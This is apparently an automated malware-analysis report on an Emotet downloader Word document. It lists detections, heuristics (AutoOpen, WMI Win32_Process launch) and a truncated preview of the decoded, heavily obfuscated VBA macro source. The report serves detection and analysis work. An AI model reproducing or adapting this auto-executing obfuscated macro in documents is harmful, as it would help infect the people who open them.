MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with an autoopen function, which is a common technique for Emotet. The critical heuristic firing for 'VBA WMI Win32_Process launcher' indicates the macro attempts to execute a process via WMI. ClamAV detection also confirms the Emotet family. The obfuscated VBA code likely downloads and executes a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6937887-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6937887-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40315 bytes |
SHA-256: 2b26238f1c7d8796a70a03b3d989d17233d89cb494695cab2adc46a836d50e8d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tBAAAG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "R1C_4A"
Attribute VB_Base = "0{B1EE40FA-7329-4C20-AA0A-E7D776C70CC0}{C8FDBB7D-82E1-4452-BAF4-BF494D09CCE0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vxAQUo"
Attribute VB_Base = "0{20557A4A-1382-474F-8B5B-78196734D616}{20852D19-4292-4190-9E98-A5287CADD69A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h_QkUU"
Sub autoopen()
If oADAADG = M4AAUA Then
Do While tDQCAQAo And QBAAwcA
While Z4AocB_U And 726376279
V44AAx = Asc(213943794 / Oct(423553993))
Wend
For BBAQDAXA = 365821946 To 166260168
UZXAXA = 120658214
Next
Set ixAXUAXA = QxA_AwDA
If pDUADw Eqv 89188184 Then
pA1DDAB = CDate(jDxoAUx)
End If
While CABDX4U < OABZAA
SxACxAB = (VAAwAU1o)
Wend
Loop
End If
If vkD_XCX = K_AB4xA Then
Do While YwXAA1U And cAcAADw
While CBAc4UB And 566333637
VA_DAZc = Asc(796066926 / Oct(289573419))
Wend
For oQU_AC = 506896795 To 578651752
SAAoBBZ4 = 486230626
Next
Set vADAD1 = I1AZAA
If acADcD Eqv 950535512 Then
AZXAZX = CDate(EoUAxBG)
End If
While IUA1X4A < jAAABk
DQAwGk = (JUU_ZU)
Wend
Loop
End If
dGGGwA
If M1GBAD_ = V_kkxX4 Then
Do While Y_1QADAB And tA_4UZ
While dUAw1w And 192489091
MAAGAAw = Asc(532600820 / Oct(825631717))
Wend
For B1wAZAD = 29409450 To 945005348
fUAxoUAX = 66032903
Next
Set zU4BAAG = iUBDAA
If wAAGQZGA Eqv 609248923 Then
b1AAAUAA = CDate(u1DUAkX)
End If
While nUwZwAUC < zQBQoAQC
kAD1DDBA = (T_XA1A1A)
Wend
Loop
End If
If U1AoZAA = sAABAU Then
Do While CBAoXkA And zAoDBxkA
While IQAUx1 And 958281172
k_G_cA = Asc(300482910 / Oct(623348565))
Wend
For KXAAB1D = 878863023 To 903272645
aZAZ_c = 320804914
Next
Set fwA_B_1B = cUABUcB
If VCUAXA Eqv 193686275 Then
wQQcZA = CDate(NBAkxAc1)
End If
While KCAZ4AX < KAAwDZDo
doUGUAxB = (jAQA4cc)
Wend
Loop
End If
End Sub
Attribute VB_Name = "lAAcGAQA"
Function dGGGwA()
On Error Resume Next
If zA1DGU = iwxABC Then
Do While EAXBAA And GQUkAGD
While WDGxAX And 790393416
EkZoUAA = Asc(367390638 / Oct(459947747))
Wend
For N4XAUC = 142121423 To 696056855
wBAAU41A = 276105562
Next
Set VxGckwB = oXAQAB
If QBADAAA Eqv 269873149 Then
PA4AXAU = CDate(bA4A1AC)
End If
While oDUBAGUA < JBZAAQ
iAxAAXAA = (GAD1AAZc)
Wend
Loop
End If
If nA4AkQAw = IA_AkD Then
Do While WDQGZQA And XBUxQB
While q_1C_w And 60743499
KUQBADxD = Asc(258666822 / Oct(149040589))
Wend
For HDAB_o = 397702972 To 261942438
iUA1oDB = 964883333
Next
Set NGAAQUAA = OUAwGUG
If SGAQBDDA Eqv 317742661 Then
p1xABZAU = CDate(CG4UAXoD)
End If
While VXcQADo < l_ZQABcU
IGc4w1x = (LAXAGAQ)
Wend
Loop
End If
If zBA_A_Q = DkwAAUA_ Then
Do While iDABkkQB And RXDoAABX
While JQQAXAcD And 468716589
NUcX1Bc = Asc(503535816 / Oct(339511960))
Wend
For nAAoAA_o = 871659490 To 705141349
ZAQZADA = 672987809
Next
Set HD_DUkwB = A1c4xAU
If fAA4DZ1 Eqv 760726948 Then
H
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.